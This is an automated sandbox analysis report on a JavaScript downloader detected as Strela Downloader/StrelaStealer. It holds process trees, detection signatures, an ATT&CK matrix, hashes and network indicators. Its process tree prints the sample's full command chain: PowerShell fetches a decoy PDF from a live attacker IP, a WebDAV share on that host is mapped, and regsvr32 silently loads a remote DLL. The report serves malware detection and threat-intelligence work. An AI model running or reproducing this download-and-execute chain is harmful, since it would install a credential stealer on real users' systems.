Windows
Analysis Report
9742962732217849.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7572 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\97429 6273221784 9.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7624 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\110 7029019240 77.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7668 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7868 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8076 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 3336 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 56 --field -trial-han dle=1528,i ,148424576 5762760364 0,12435769 0038430344 52,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 8148 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
11% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588514 |
Start date and time: | 2025-01-11 01:57:25 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 27s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 9742962732217849.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@28/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 2.16.168.107, 2.16.168.105, 54.224.241.105, 34.237.241.83, 18.213.11.84, 50.16.47.176, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 23.200.0.209, 23.200.0.200, 23.200.0.196, 23.200.0.181, 192.168.2.4, 52.149.20.212, 23.41.168.139, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
19:58:21 | API Interceptor | |
19:58:26 | API Interceptor | |
19:58:27 | API Interceptor | |
19:58:39 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073448250942772 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In |
MD5: | FB78767A31C8D5460D9C27D2FF53B35B |
SHA1: | 57F8B207FF3B40122F2C120CE2B582B791FADF47 |
SHA-256: | 5AF47E179842025C657D3950818AD27174DC6CD6D4AADE57BE096470F6B786D8 |
SHA-512: | 48C049308A6CAF71BC55D4EEDCD74B9201C72C9B508EF8244FBF2683AECC2D1CB0F5E2B7473DDA3FD8BBE923C6C10E6F350D2F20BD70607CB9E506D087821D3E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42206217073329505 |
Encrypted: | false |
SSDEEP: | 1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO |
MD5: | 528CB3F981F3F28164C933C30F6DBAAB |
SHA1: | B66FE652AA14EBA05A8BBBDABE6B414A2470824E |
SHA-256: | F8B08A055D27E6A38AA0979B0BDD5B928C5FF665CA7D3A667903F66699B21632 |
SHA-512: | C83F16F0F41A3B816E2BD7FACA2EF0C39849A01DA4DC7ED7AF892BD20804417B6CE0F08EAE8AED8770AF62432902E992F0701B039589F65176C6A4CBBC373D87 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07524827683514124 |
Encrypted: | false |
SSDEEP: | 3:vm/lyYeMNM6lkjn13a/cQr9t/lollcVO/lnlZMxZNQl:vW8z6w53qcMGOewk |
